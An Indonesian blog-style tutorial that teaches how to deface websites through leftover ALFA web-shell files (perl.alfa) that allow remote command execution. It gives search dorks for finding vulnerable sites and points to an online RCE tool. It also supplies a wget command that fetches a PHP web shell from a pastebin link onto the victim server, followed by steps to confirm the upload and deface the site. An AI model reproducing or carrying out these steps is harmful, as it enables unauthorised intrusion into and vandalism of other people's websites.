Deface Poc Alfa Perl (RCE) Upload Shell

Hy semua, balik lagi dengan nzul jadi disini aku akan ngasih tutorial cara deface Poc dengan metode RCE perl.alfa.

Jadi ini tuh bekasan upload Shell Alfa yang hilang jadi kita bisa remote nya dengan tools perl Alfa RCE.

Oke langsung lanjut ke tutorial nya

Bahan-bahan yang harus kamu siapkan

• Dork?

inurl://ALFA_DATA/alfacgiapi/

intext://perl.alfa

index of /alfacgiapi/per.alfa

Index of /ALFA_DATA/alfacgiapi/perl.alfa

( Racik dork nya atau kalian bisa kembangin sendiri )

• Tools ( Perl Alfa Rce )

• Command upload Shell

wget https://pastebin.com/raw/ept8KywF -O nzul.php

Pertama kalian dorking dulu webnya dengan dork diatas atau dork racikan kalian sendiri.

Ketika sudah Nemu webnya kalian klik per.alfa

Kalo blank berarti webnya vuln Alfa perl RCE.

Selanjutnya kali masuk ke tools nya

Exploits.my.id, dan salin URL tadi 

contoh:

http://site.com/ALFA_DATA/alfacgiapi/perl.alfa

Kemudian cek dengan command ls -la

Kemudian masukkan command upload shellnya

wget https://pastebin.com/raw/ept8KywF -O nzul.php

Lalu klik " Gaskan "

Jika tools nya kayak gini? Berarti Shell kalian telah terUpload ke web tersebut.

Kalo kalian ingin ngecek Shell nya ke upload atau enggak kali bisa masukkan command

ls

Dan akan terlihat Shell kita telah terUpload.

Boom, terUpload kalian tinggal deface deh

Akses?

http://site.com/ALFA_DATA/alfacgiapi/shellmu.php

Mungkin segitu aja tutor dari nzul,

Kalo ada gak paham boleh tanya di kolom komentar

See u next time.